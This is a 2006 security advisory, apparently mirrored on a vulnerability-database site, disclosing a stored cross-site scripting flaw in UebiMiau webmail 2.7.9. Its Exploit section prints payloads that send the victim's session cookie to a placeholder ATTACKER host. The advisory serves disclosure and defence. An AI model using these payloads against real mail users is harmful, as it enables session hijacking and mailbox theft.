Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:11228
HistoryJan 30, 2006 - 12:00 a.m.

UebiMiau Webmail System Security Vulnerability

2006-01-3000:00:00
vulners.com
41

I.Vulnerability
UebiMiau Webmail System Cross Site Scripting Vulnerability

II.Vendor
Aldoir Ventura

III.Affected Systems

  • UebiMiau 2.7.9 (latest release) and probably previous versions.

IV.About
UebiMiau is a simple, yet efficient mail reader (webmail) supporting both
IMAP and POP3 without dependence of any PHP's extra modules or database
(http://www.uebimiau.org).

V.Description
UebiMiau does not filter HTML e-mail messages correctly, it's possible to
inject mailicious scripting codes to an e-mail. An attacker is able to
hijack a user's session and access victim's mailbox just by sending a
specially crafted e-mail message.

This is a dangerous situation because there is no need to click a link in
some cases, client-side code executing when the user opens crafted e-mail.

VI.Exploit
<img
src="javascript:location.href='http://ATTACKER/StealSessionData/?&#39;+document.
cookie;" />
<img src="javascript:[XSS];" />
<a href="javascript:location.href='http://ATTACKER/StealSessionData/&#39;&quot;&gt;test
link 1</a>
<a href='http://ATTACKER/StealData/&#39;&gt;test link 2</a>

VII.Vulnerability Status

  • Vulnerability discovered on 2006-01-12.
  • Vendor notified on 2006-01-12.
  • No response from vendor, vulnerability published on 2006-01-28.

VIII.Workarounds

  • No vendor-supplied patch is currently available.

IX.Credits
M.Neset KABAKLI
Wakiza Software Technologies
neset{at}wakiza{dot}com
www.wakiza.com